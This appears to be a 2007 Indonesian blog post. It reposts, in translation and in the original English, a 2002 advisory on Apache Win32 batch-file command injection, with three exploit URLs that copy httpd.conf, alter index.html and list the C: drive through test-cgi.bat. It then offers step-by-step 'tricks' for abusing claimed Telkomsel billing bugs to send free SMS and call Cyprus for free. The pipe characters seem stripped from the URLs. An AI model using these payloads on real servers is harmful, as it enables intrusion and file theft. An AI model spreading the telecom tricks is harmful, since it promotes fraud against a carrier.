Saturday, March 31, 2007

Vurlnerability Apache

Kemungkinan menggunakan remote command dengan penggunaan karakter ''. Pada Apache Web Server 2.0.X disertakan file /cgi-bin/test-cgi.bat yang dapat digunakan untuk pengexploitasian karakter '' ini. Tetapi bukan hanya itu saja, semua file dengan extensi .bat atau .cmd dapat digunakan untuk exploitai ini.

Contoh Penggunaan :

1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd. conf Perintah ini untuk mengkopi file httpd.conf ke public wwwroot (sama dengan c:\inetpub\wwwroot di IIS)

2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html Perintah ini untuk menambahkan kata FOOBAR ke file index.html di public wwwroot

3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt Pasti tau :)

Catatan ;
Karakter '+' menandakan spasi (spacebar) (sama dengan karakter %20 di IIS)


ORIGINAL :
Vulnerability in Apache for Win32 batch file processing - Remote command execution
= Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com
= Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
= Vendor: Apache group
= Product: Apache web server (Win32) - Running DOS batch files

Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)

= Severity: High, remote command execution and arbitrary file viewing.

= CVE candidate: CAN-2002-0061 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)

= Summary: Because of a the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('') character.

** IMPORTANT **
The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.


= Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.

Example:

1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd.conf

This request will copy the httpd.conf file residing in the /conf directory of the Apache installation, into the virtual web root where it can be viewed by any user.

2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html

This will append the string "Foobar" to the index.html file residing in the virtual web root directory.

3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt

This will create a file containing the directory listing of the C: drive, and will put the file in the virtual web root, where any user can read it.

** Notes:

1) Url-Decoding is not provided by Apache except for the '+' character which is substituted by a space character.

2) Spilling the output into the STDOUT would most likely cause Apache to write an error message since it expects the STDOUT of a CGI script to have an HTTP response format (potential HTTP headers followed by a mandatory blank line followed by a response body). Therefore in order to view the result of a command, it is
recommended that you redirect the output to a file under the web server's virtual root.


= Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later today), or 2.0.34-beta (which will be published soon). Downloads are located at:
http://www.apache.org/dist/httpd/

Bug Telkomsel

FreeSMS / SMS gratisFreeSMS ke sejumlah simcard dengan kode simcard 081226***** (simcard dengan code wilayah 26*****) kalau tidak salah code area jakarta.
Dengan bug terdapat pada sistem losting data transfers pada tiap melakukan sms sending. (atau mungkin memang dari pihak telkomsel sengaja dibuka ? ) hingga dengan bug ini kita bisa manfaatkan sejumlah fasilitas sending sms dengan semua format ke sejumlah simcard dengan kode area 26***** / 081226***** secara free /gratis.

Dengan cara sebagai berikut:
1.Simcard yang akan dipakai HARUS turunan Telkomsel (Simpati / As / Hallo / Hoki ,dll)
2.Tulis Sms seperti biasa dengan format bebas : D
3.Cara kirim sebagai berikut: (perhatikan – karena masih ditemukan pada code area 26*****)
•nomor tujuan misal 0812266523*
•jadi kita hanya tuliskan nomor tujuannya dengan cara : 2266523* <*nya ganti dgn angka aja atau terserah mau dicoba dengan nomor mana aja>•dan kemudian … ? nice job .. terkirim juga kan….
Bisa kita lakukan paling enak bila ga punya pulsa ? bisa lebih asik.Ingat … ceck sekali lagi pulsa anda bila tdk yakin… ? saya jamin ?
•Hanya bisa/berlaku di simcard turunan telkomsel saja.
Oke .. nice … Note : BILA TRIK TERDAPAT LAPORAN PESAN FAILED/GAGAL BERARTI ADA 2 ARTIAN : 1) NOMOR YANG KITA TUJU TDK TERDAFTAR/TDK ADA
2) PIHAK TELKOMSEL TELAH MEMPATCHING SYSTEM INI
Trik ke 2
TELPHONE GRATIS INTERNASIONAL (Ke negara Cyprus ? )
Dengan simcard turunan Telkomsel kita bisa melakukan telefon gratis ke negara cyprus (kenapa cyprus? … heheh saat ini felling saya masih ke tahap “aneh” ) karena bug yang saya peroleh adalah kode area negara +357******** .
Ntah karena angin apa pihak Telkom dengan telkomselnya melakukan losting data area ke negara Cyprus..? itu juga tersirat dalam fikiran saya. Dengan demikian telephon secara free/tanpa biaya sepeserpun bisa kita lakukan. Hingga sampai kapasitas bisa ngobrol dengan “bule” diluar negeri sana sepuas hati sampai “kuping panas” (lumayan untuk latihan tofel/ cari cewek bule ).
Oke triknya seperti biasa:1.Gunakan simcard turunan Telkomsel (Simpati / As / Hallo / Hoki ,dll). 2.Ceck terlebih dulu pulsa anda bila blum yakin, (DIJAMIN/garansi ?)3.Ketik nomor telefon seperti biasa diawali dengan kode area tujuan negara tadi… misal : +35799942026 / +35795621145 dll ? banyak sekali she … hampir bisa dibilang semua nomor bisa kita hubungi FREE 4.Bila tdk terdapat nada tone berarti nomor tersebut blum dipasang/sedang kena galian kabel telkom disana.5.Dengarkan … apakah bisa … ? … 6.Nice .. crongatulation … 7.Telfonlah sampai kuping panas dan sampai bibir anda keriting .
Note: JANGAN LAKUKAN TRIK MENGGUNAKAN SIMCARD SELAIN TELKOMSEL!!KARENA TRIK INI TIDAK BERFUNGSI PADA SIMCARD LAIN….
Dalam hal ini pihak telkomsel belum merasa dirugikan karena pihak telkomsel tidak tahu hal ini atau memang pura² tidak tahu